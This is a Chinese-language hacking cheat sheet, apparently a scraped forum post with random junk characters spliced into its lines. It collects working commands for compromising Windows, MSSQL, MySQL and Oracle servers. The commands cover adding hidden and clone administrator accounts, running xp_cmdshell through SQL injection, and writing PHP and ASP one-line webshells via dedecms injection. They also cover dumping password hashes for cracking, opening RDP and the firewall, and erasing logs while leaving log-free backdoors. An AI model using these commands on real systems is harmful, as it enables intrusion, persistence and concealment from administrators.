. `3 j; e2 J5 Q9 D; |
1.net user administrator /passwordreq:no5 ?/ x& w1 @ A8 [" M
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
- r( h+ @. G3 l# X" E. x2.比较巧妙的建克隆号的步骤
/ a3 d3 N* G) v先建一个user的用户
& q/ O1 R8 \# W- S I然后导出注册表。然后在计算机管理里删掉/ q! ^6 S1 ]3 {& ^% H$ k
在导入,在添加为管理员组6 U0 r: p: c2 g, O; {
3.查radmin密码
9 O4 R* F8 I# v2 U$ K* }1 |9 Qreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
& a* L# J" ?: ~6 L+ B! o4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]6 J: ]) Y' z+ `- W4 i. s
建立一个"services.exe"的项
# X$ t& F9 E7 g# G( K% j5 F& [4 _+ s再在其下面建立(字符串值)
% j$ U1 ^4 M" H- R/ c6 @/ Y键值为mu ma的全路径
. O0 Q. e" P9 M9 m3 z- C5.runas /user:guest cmd
; e/ w+ ?1 C- O测试用户权限!' o2 Y$ Y4 f3 O; U7 P+ q
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?% e1 \$ i, X& _
7.入侵后漏洞修补、痕迹清理,后门置放:# |1 X, }0 a& o" O2 B' P3 Q
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
# e! C3 s# q8 D. P8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c4 r% Z# j" ?# _1 \! B
9 d. ~* O; T( r) l' m
for example
5 E% [5 l+ d2 F3 E) F- w N
5 P2 `$ r7 c8 l5 |+ A9 Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
# x0 w# t$ A; U5 q: k
* b: U$ o1 D u5 X4 tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
' F. H7 w0 e- [( D k( A" t
( \0 j; @( ]1 G9:MSSQL SERVER 2005默认把xpcmdshell 给ON了' g1 s5 W: E1 `$ C7 E
如果要启用的话就必须把他加到高级用户模式
6 V) }' y) A9 n$ V8 X3 B$ [/ I; a# f可以直接在注入点那里直接注入
) k6 v: _0 V' F0 {id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--& k1 z/ H9 p+ g: ~$ i4 ?8 K
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--& F) o6 [" a7 M$ K+ ?) b
或者
2 o1 ^0 s0 F% Osp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'/ w, |) ^* Z" J% i- K( \$ s
来恢复cmdshell。2 n5 G8 _: x+ V
" ~& ^7 A0 `" X9 S! j4 e* x. T; d
分析器2 d# {1 f# D6 J. j' [/ a' {1 i0 ]
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
8 o$ o- C |+ ?" q然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
# A! u! d1 |, T$ H" [$ N9 X. W10.xp_cmdshell新的恢复办法
, o1 F) H" B$ K+ A8 H0 [xp_cmdshell新的恢复办法+ ^" I/ T' e8 G2 ? C! b6 O% U
扩展储存过程被删除以后可以有很简单的办法恢复:/ j# _( j2 I# R
删除- T! }& c/ o2 |" g
drop procedure sp_addextendedproc7 x3 M, ]; T$ G/ u& I# ]
drop procedure sp_oacreate5 |3 t( z" h- P7 p: o
exec sp_dropextendedproc 'xp_cmdshell'' [3 K' q; D1 {4 ^- n8 p7 F
, \+ A# t. t! R+ J恢复8 \7 e. C: j% I( X
dbcc addextendedproc ("sp_oacreate","odsole70.dll")" Y# k: ?" q" `: h& c; I
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")8 z+ ^/ n2 x2 m3 h
7 J, ]2 W- i2 Y4 ~( _) \ D- r
这样可以直接恢复,不用去管sp_addextendedproc是不是存在5 f; Z6 i- P5 t {0 |3 ~; L
3 @6 ]7 `# E; a7 |% O7 y" \-----------------------------+ ]3 Y9 N; X! J9 N5 p2 n
- G3 Y5 f5 n, s3 E* g删除扩展存储过过程xp_cmdshell的语句:
* `; v# o# q& B8 Uexec sp_dropextendedproc 'xp_cmdshell'
4 x9 o0 ?" L5 F0 S& @0 j& b8 u& e( m" S
恢复cmdshell的sql语句4 K9 n; L& j) E _% C
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
; w5 z' Z' R! J5 x% [# F- z" W/ P) T% z6 K, r" r o- m+ V, G4 F
. J+ ?/ Z/ Q% }" R0 K开启cmdshell的sql语句: t! ~& @9 U0 e! ]. |2 ~0 O
; h: q: F0 L& K& _
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
6 p0 j# P8 h: n- j6 v* w/ P8 s; M5 ?$ q! B0 K, m
判断存储扩展是否存在- b4 T( L7 s! K1 T, c R
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'0 I7 [- z' i5 n; u
返回结果为1就ok
( k) Y+ f r& I. l$ q$ Y* T4 ^. h3 n* `6 ?: w& C# y
恢复xp_cmdshell
1 }. J" g9 J5 O4 Hexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
& K) ]/ p1 Q! S# L3 H- L) ^返回结果为1就ok
; M3 f$ Y$ a; D, }9 d6 z
. F; E$ b/ L4 ^' ~/ `; z否则上传xplog7.0.dll$ e3 F* C0 z0 B
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
" F+ R) N1 b0 d2 E" x4 M m% R) ^+ K7 z$ H8 J
堵上cmdshell的sql语句5 X4 K/ S! R4 n- |; P0 F& }, V! a
sp_dropextendedproc "xp_cmdshel4 M; n0 i! v& M4 d* X, U
-------------------------: C% l/ U6 N- R X9 v
清除3389的登录记录用一条系统自带的命令:
7 o$ C# K- z! f9 [1 a/ p$ j) oreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f6 J4 b1 C J6 l0 X
, o! [. L2 U" p' @. n ~7 f8 _8 O
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
, N5 X, \- ^ m" h在 mysql里查看当前用户的权限* f; E6 O# B0 ~, T! I$ z/ U) d
show grants for
2 E+ M$ a5 q, X$ \
, G; e) }6 V8 T2 O以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。6 r6 d: N! ]& |$ ?+ N5 ^
" w$ F2 [5 k3 V
4 g9 d. Y7 {6 T. g4 {Create USER 'itpro'@'%' IDENTIFIED BY '123';
5 D& B5 b: e7 V6 E" S! {; ]3 \$ t( j' |
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
" l, e) f K* i# K" R3 p" @2 A! P$ m4 g3 G" e V
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
8 n& b% \& @# q# C$ B; q9 ]# W% A6 m# I! a
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
3 H8 G! _0 D l5 j n" R6 p. I' K E& u0 G h# K
搞完事记得删除脚印哟。; \: q3 z7 v# u8 {9 j8 @( s3 y
& j( R: j7 U! w% ZDrop USER 'itpro'@'%';
( p- @+ q6 G' {4 P0 w& y, [
7 z4 z4 A1 L0 W5 b5 w. LDrop DATABASE IF EXISTS `itpro` ;
2 U: g/ ?! s) ?8 C" S& W
2 E; `3 \, y* }# y当前用户获取system权限1 [% f8 X; F# b; q" y# d- k
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
, J1 ]6 X5 g& ^9 g" dsc start SuperCMD& ]$ ?2 d; M. A. A9 z
程序代码. ?5 O2 a% g. e- I! t% a) `8 L
<SCRIPT LANGUAGE="VBScript">' ]3 \% J8 }: R# p
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
1 y3 f4 i. m" @% Ios="WinNT://"&wsnetwork.ComputerName# G% T& k/ s9 f# X. J
Set ob=GetObject(os)
( f, S+ j$ ?/ @; w; f+ OSet oe=GetObject(os&"/Administrators,group")* X2 n' k2 c! z W
Set od=ob.Create("user","nosec")
( h. C v4 ~- y9 P! N8 Hod.SetPassword "123456abc!@#"
) G% `( L* K2 G ~6 m( _/ God.SetInfo
9 x6 r% b& p8 D. MSet of=GetObject(os&"/nosec",user)
+ T( H# \" Y% \+ @9 Voe.add os&"/nosec"1 v d7 N6 E: w: \
</Script>* d; ?: W Y* q0 T q
<script language=javascript>window.close();</script>
9 d' E1 W* P! H% A! H& l+ i& n, @' }3 P$ P/ m- }" e B" [' U
8 B' }) O3 n/ c D$ K" r$ Q$ m8 G: p* O+ ^5 n: ]
; A) m) v6 k& o3 d) o! [
突破验证码限制入后台拿shell8 e" b. [2 K4 U4 Y
程序代码
$ `) Y x+ @# [. U$ mREGEDIT4 5 R5 A* U# Y* P" S9 X" @
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
x J7 \) s/ j* d"BlockXBM"=dword:00000000
# n* }4 C9 b6 R' L3 I& O: Y( ]8 e; G/ c7 o1 Y' V; o
保存为code.reg,导入注册表,重器IE
% l: Y+ f- w8 x! Q8 `. ^就可以了
! V$ |* K' F: M8 a1 d1 @( X0 Bunion写马
: L- S) j# l& `& D5 r* Q- J) D程序代码
, p0 E) ~5 i# Mwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*: B! l6 t& ^0 |& r7 ?+ Z3 j: d
6 P1 r4 A' H7 n6 I& A7 F+ m应用在dedecms注射漏洞上,无后台写马
$ Q* P3 c, H( t0 j* ndedecms后台,无文件管理器,没有outfile权限的时候: ^1 ?/ E/ F9 P6 O
在插件管理-病毒扫描里
2 f+ [7 X3 K. o0 U: s写一句话进include/config_hand.php里
5 V4 s- l7 R( U) ^% U6 C. W程序代码5 o w/ O& |$ |' S0 ?
>';?><?php @eval($_POST[cmd]);?>
% F1 V% | y" h0 [" Z& O, ^; u
& V' [9 t2 O2 E p
, w2 j. @% o3 i# Q# \8 x' V: a, `如上格式
, G: I2 M) L* P3 g- w9 ]$ D% S' U. K- v) o9 t5 q
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解& L; S' _! d h. x. O. {
程序代码 I, A! @0 g4 g8 Q5 _# U# z. R
select username,password from dba_users;
& ^) [, ^& Y* D* q: t5 c4 h% g& w( y* I% A+ B
$ C* P1 e7 ~! m1 {8 qmysql远程连接用户# S8 l1 y" c" u! E$ P
程序代码7 }# u; g+ p- H: g* K3 k
g9 E3 N R; k; I5 v. w
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
- C( ?- ]/ g* vGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION6 q2 `0 s6 J0 K. W
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
7 P' F& [ |5 b* I2 P1 t! IMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. Y0 t2 O: |# C. X) D K: l4 N. K
8 i+ o7 N# v* ^
' ^( m. U8 X; z% H' m: ?& m) n5 _2 a/ K! |# Y! Z7 P: o
5 j" L% K. g+ W1 u
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
* v% @' K4 ]1 Z3 e+ w8 N2 G5 b% k& t8 Q# ?4 w
1.查询终端端口
6 N3 R: V! X5 r1 F8 U9 n$ j) ^* d' q* Y( _+ g! t+ u3 a! E
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
8 G R- A8 ?( `. E& _% x- q1 ~8 S+ _* R/ x. s1 G2 {, g
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"6 W$ {9 }5 K+ C
type tsp.reg5 K8 @$ E* x: b, N" g: t' h) ?
2 `4 {0 Q1 ^$ P! m _
2.开启XP&2003终端服务
0 Q3 N3 \0 N# O3 h; C8 a( G% @) D. m1 m% v5 P6 b
0 _' A$ A8 {( ?6 J, G1 W) I
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
; Z9 P. J0 @: s) W+ g$ F
$ U4 H1 |, h2 [6 Q; }( g! I0 a. i; a+ z3 K }- ~( z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# Y" U' B; r/ P6 g/ J) I! f+ {7 c5 v2 b1 e
3.更改终端端口为20008(0x4E28)
- n2 e$ |; r. V" p% k+ ~9 q
5 B& p! j% D0 dREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
# [, b$ P4 Q, S. {7 b' p! o; ~
! B9 I" t q9 B( d' Q# v( k* FREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
0 \" [- }# n# B) f
6 w9 `* o9 x! H- ], M* h' z! h4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
' M5 r7 A1 l' d! y# O/ I1 C* x) P) k* I; q/ Y& x$ I
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f) ]; S1 _' o* ]3 |: N# D
- T* E3 M% s0 Z+ U) s: O' K/ e! v$ f# C
5.开启Win2000的终端,端口为3389(需重启); N8 Q6 w+ g# Q( E4 _* u
5 m' Q ?# S4 z3 ?. |) Pecho Windows Registry Editor Version 5.00 >2000.reg 0 [8 p; |8 C4 a$ s! |( u
echo. >>2000.reg9 a' [7 K7 \" _ T. G+ ~4 b$ O3 V, Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
6 [ r# M i! p" ]3 N. ~echo "Enabled"="0" >>2000.reg
# f9 a- }+ ]+ U/ Uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
2 j' C1 ?0 K) k4 M k' Yecho "ShutdownWithoutLogon"="0" >>2000.reg
: c! R0 M$ }& k* f& @; }" \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
: Y. V# @$ P4 ?, G+ Techo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 0 B/ Z/ T2 w. w0 s7 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% G, k7 K& Z8 e, p( l7 U. A+ qecho "TSEnabled"=dword:00000001 >>2000.reg 5 I8 d6 e7 Y' D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg M7 i" Z2 ^0 ?) I
echo "Start"=dword:00000002 >>2000.reg
+ O( ^ j% F# _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
, A- a# H' o4 M8 w# q+ {% V( x8 iecho "Start"=dword:00000002 >>2000.reg
+ w9 H6 B- Y2 |0 s r% Recho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg " e, H& C) G6 Z$ C
echo "Hotkey"="1" >>2000.reg & M3 \# u. N/ v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 3 ?6 M" p0 O6 B' N: N
echo "ortNumber"=dword:00000D3D >>2000.reg . R/ h4 B C2 h* C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg % c( I; f9 m) q0 ]( H+ s( Q Q
echo "ortNumber"=dword:00000D3D >>2000.reg7 y- U7 a: E/ ~) n ~
* v( R. g; g, u) J X6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)9 ?# B* F5 l; n; d
- {0 u/ r% S7 r2 A6 i@ECHO OFF & cd/d %temp% & echo [version] > restart.inf$ R% g5 g; _# q; n. X4 N6 B( y
(set inf=InstallHinfSection DefaultInstall)$ B+ Q1 p# X. u! o0 h: O# a5 C: ?3 Q$ Q
echo signature=$chicago$ >> restart.inf
8 i; u2 A' r4 d: ?% Kecho [defaultinstall] >> restart.inf# _* q& W- o" Z; _. s5 U
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7 _2 ~8 p3 v- a. L$ V- K- ?4 \$ u. {# _# v5 ^
+ S& k4 }) D4 g4 |+ C! D
7.禁用TCP/IP端口筛选 (需重启)
2 p" c) k8 I8 ]9 O7 e6 D. B E8 }( D q/ ?3 m$ q: ?, w
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
+ J) O& `6 X4 r! X; o& a0 [7 u- j% K( l) n- B: @6 L, J3 A% M4 j
8.终端超出最大连接数时可用下面的命令来连接 O# v6 j% N" t! T
. w1 Z% ~$ k: m5 ?
mstsc /v:ip:3389 /console
4 g, }( B8 q6 ^9 j N' [. f; Y( C" A# L5 T% d; {$ F
9.调整NTFS分区权限
1 o7 a- j+ Y, N
$ I1 A2 e* x% F5 U% [( b: p acacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
: {* w; C& m2 [' y! ?! ^; |
, [! Q/ p$ c/ a4 f5 v8 n. y" ]8 A3 ncacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)5 B: N4 G4 @" q
' K1 p7 C7 X) s0 k8 w2 H------------------------------------------------------( `( H0 ~( Z: n. `2 G \
3389.vbs # `# m& T% l- A5 p$ ~$ q
On Error Resume Next6 Z5 r* W1 i& u8 x& ~6 d; Y1 M6 m
const HKEY_LOCAL_MACHINE = &H80000002
* e$ g5 X! u$ }# \: Z) I" P8 OstrComputer = "."+ n* y8 F$ i. N/ @2 r y
Set StdOut = WScript.StdOut
3 ^7 F( e) ^2 D1 TSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
' F, H. d8 e- A+ m3 ?strComputer & "\root\default:StdRegProv")' ?3 ]" E+ K3 B0 o% U9 B" g
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
! p1 T9 E ~5 j% p& ]; [5 K6 T# Goreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
# q/ m8 Q# ^, g8 v3 W9 jstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
. l! k$ @& h. I0 moreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath: \- U6 Y G4 k* \! }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"- Y& n" f5 g, X) l7 }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
/ ^6 R5 O& V" y% u5 @strValueName = "fDenyTSConnections"1 n! q+ s/ B* H7 c" q9 ?' X
dwValue = 0# }0 N6 P! W& R# {& c( x
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue/ k1 h- d& ?# ^/ W6 H5 }" m
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" N! n2 L9 K9 }* ?- i
strValueName = "ortNumber"
( |4 t {7 o n/ ? OdwValue = 3389, N, x# V* c! F. e8 D4 ]
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 v$ F3 o4 a1 A: R0 U
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 C' f5 V/ b2 t; U
strValueName = "ortNumber"8 P) L( q. O+ \' O4 J$ c
dwValue = 3389
; m, I8 }& ]7 G' uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue4 t9 C# { p9 r" ]
Set R = CreateObject("WScript.Shell")
. H* S3 \: ~! X6 a5 TR.run("Shutdown.exe -f -r -t 0") - Y6 n8 N6 K( b0 a7 M
v. v: g% _- P/ P0 m: _
删除awgina.dll的注册表键值9 N. {3 j' |# e% S0 o" [. @2 G9 c
程序代码3 b/ w* e1 b! v3 R
7 q- ?! G0 ~6 V* X- Freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
4 Y$ T5 R( y# I( \: ~0 ?8 k7 ?" t: b/ y/ M
+ H' G# i' a, S- H; V
& m) G8 ?: Y" a9 n2 k$ C; p8 T" ]% ^( I) D5 @
程序代码
) _+ e3 o; [9 EHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
: o2 f) g% }: Z; l
+ Q0 q) H4 e8 Y8 }+ o设置为1,关闭LM Hash4 H. T& Q f2 Z
7 p! V: G7 T* A, K+ Y( D. \数据库安全:入侵Oracle数据库常用操作命令
2 i7 z; Q! z0 P5 @最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。 [3 Q/ V2 |5 i- z' a, N
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
& v( J, M' F6 S6 l; f, I2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
, w/ Y. D! T& b& M( R3、SQL>connect / as sysdba ;(as sysoper)或
9 d6 k' s$ I+ y. `% V4 |connect internal/oracle AS SYSDBA ;(scott/tiger)/ q" `4 _: I. j/ b& [! B
conn sys/change_on_install as sysdba;# E4 I+ O6 ~" q" C- b3 a
4、SQL>startup; 启动数据库实例, m& h3 ^1 r: A) p4 u2 x5 D
5、查看当前的所有数据库: select * from v$database;2 q) z! h6 T2 K2 e2 P& X
select name from v$database;
. H. }% Y9 w+ ~/ w+ W( {6、desc v$databases; 查看数据库结构字段
. E; n. X9 F% k( H* i7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
# U5 x, l+ {! r# G" K/ q& \5 ~SQL>select * from V_$PWFILE_USERS;
" f9 r5 l6 c3 f( B& c& g, MShow user;查看当前数据库连接用户8 _# Q5 Q/ S! H0 v* K
8、进入test数据库:database test;$ S6 R7 S! I4 X! {% s$ T% H, d9 L' V
9、查看所有的数据库实例:select * from v$instance;) w8 n$ i8 t) _3 X) u8 p% M
如:ora9i9 p- F& n/ d& B# q
10、查看当前库的所有数据表:9 G6 J' P+ \1 w
SQL> select TABLE_NAME from all_tables;/ _1 C4 x, T* n& L& Y0 O
select * from all_tables;7 I: ?: R6 K, ~7 g m8 b
SQL> select table_name from all_tables where table_name like '%u%';
0 u1 T- K$ ~) x0 v! q- [TABLE_NAME! j/ p- {) p2 o9 K) K. _2 Z: B1 L- Q
------------------------------
- s" z: u% x5 x+ O t_default_auditing_options_" |; S! Z( |7 ~/ M# V8 @
11、查看表结构:desc all_tables;
# P7 k* H. K1 @4 {! O" p$ O12、显示CQI.T_BBS_XUSER的所有字段结构:8 r/ l( p: |- A4 v$ r1 Y
desc CQI.T_BBS_XUSER;
4 K+ b% l: j1 |& E; ^13、获得CQI.T_BBS_XUSER表中的记录:3 J5 J* v8 g1 u/ w: g( i7 {1 \
select * from CQI.T_BBS_XUSER;
# O: S N+ S$ X* v. H14、增加数据库用户:(test11/test)
* }3 I2 X/ q. Q3 @0 j: D0 dcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;& o5 L; [/ a3 U- i7 Y' i
15、用户授权:
f8 N; ]# e( V4 R" lgrant connect,resource,dba to test11;
$ ]3 h M$ d. P) y9 b& Jgrant sysdba to test11;
% P) L! I! W0 {$ `commit; L' Z* D4 T3 X9 w+ f2 r! I
16、更改数据库用户的密码:(将sys与system的密码改为test.) J% c" r/ I k( H/ X
alter user sys indentified by test;) I$ ~4 m: f0 s, l: x3 D+ r3 k- I0 c
alter user system indentified by test;% s4 \5 a" Z! j2 k
2 y4 f0 u7 ?* A
applicationContext-util.xml
& Q2 U" @$ F+ e$ x9 NapplicationContext.xml1 z1 h' @- `3 F
struts-config.xml
$ w# h9 `: A! o/ v: Xweb.xml+ S5 c V. B3 M9 d0 J8 `
server.xml
7 _- N! \. y, i1 v# J0 U* f8 \tomcat-users.xml# I4 X. J, L% `- G/ W
hibernate.cfg.xml# r& t0 S6 F/ t* f
database_pool_config.xml
7 `) s1 w8 L0 f
$ ~9 V/ g* L; s( [6 G+ g, w2 e+ ?/ ~ ^+ l, O- S; K' e' Y* R# e% v
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
2 z6 e. }$ I7 S( U/ C4 b% ^" N: F\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
# {$ I* v, i$ V- D\WEB-INF\struts-config.xml 文件目录结构
8 X* J5 T& j! {5 \$ A" K- j3 ]# v) G5 V- W3 n( K$ z; v# c$ C) L: ^0 {$ D
spring.properties 里边包含hibernate.cfg.xml的名称3 i1 |. i U) Z5 r! K- ^# d2 Q
! Q3 x1 \: V* X9 n
/ b! m. t4 C4 Q( F; j$ Y/ M& W7 O
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml! i1 a3 i3 L" `/ X% p: b }; Y( ?
1 |& Y9 G8 g- [+ I) ]
如果都找不到 那就看看class文件吧。。
# H4 V4 v# r% {5 H$ u8 F O l9 d O3 a* ?
测试1:4 V- |% m7 B4 H9 F( ]
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
: n5 |4 W7 | ^# r% y' @' c7 R- t j* [5 ]; Y% E. z: l
测试2:
. h, }9 F, ?, \4 {; i3 U. Y+ g/ d" Y2 F! v: y ?, b
create table dirs(paths varchar(100),paths1 varchar(100), id int)+ n4 u J" T/ D3 T! G( y9 v$ f
4 x$ f2 B7 t! I0 W0 @/ _1 y2 {3 H
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--+ e: C( {" W2 D7 ?
! N! p# L9 I7 D/ Y! b+ ]7 w% g+ _8 pSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
n4 A5 C! k. ^: N1 f, t( x; C& U% ]2 X3 _7 {2 f( P+ _; t
查看虚拟机中的共享文件:4 p6 G# k' S9 T8 b, o
在虚拟机中的cmd中执行; G1 O" }1 y: }, J8 h7 G6 \
\\.host\Shared Folders
) o. C. V5 G4 M& |7 q" h' r, v& X+ ~5 F) b/ n+ ~6 v
cmdshell下找终端的技巧# L" y+ V% _4 [
找终端:
: _3 F: S. B: f, V E3 { s+ x8 p第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
K9 d9 Y* @5 [% W6 y# T$ { 而终端所对应的服务名为:TermService ! ] C$ L l- ?( O c) G
第二步:用netstat -ano命令,列出所有端口对应的PID值!
2 A0 n0 t- `. O, o7 a1 f, i: L 找到PID值所对应的端口2 M- F; ?7 S" S: U' S
. t: [5 E7 | l% A查询sql server 2005中的密码hash
6 w: K( b/ y& U5 s T! L$ v8 e7 TSELECT password_hash FROM sys.sql_logins where name='sa'
# a2 \8 K& R8 U9 ASELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a) M+ `( }# Y1 k# S
access中导出shell: }0 ]5 i5 `6 V" Q
) h* u$ [; J, }$ I! S" c中文版本操作系统中针对mysql添加用户完整代码:
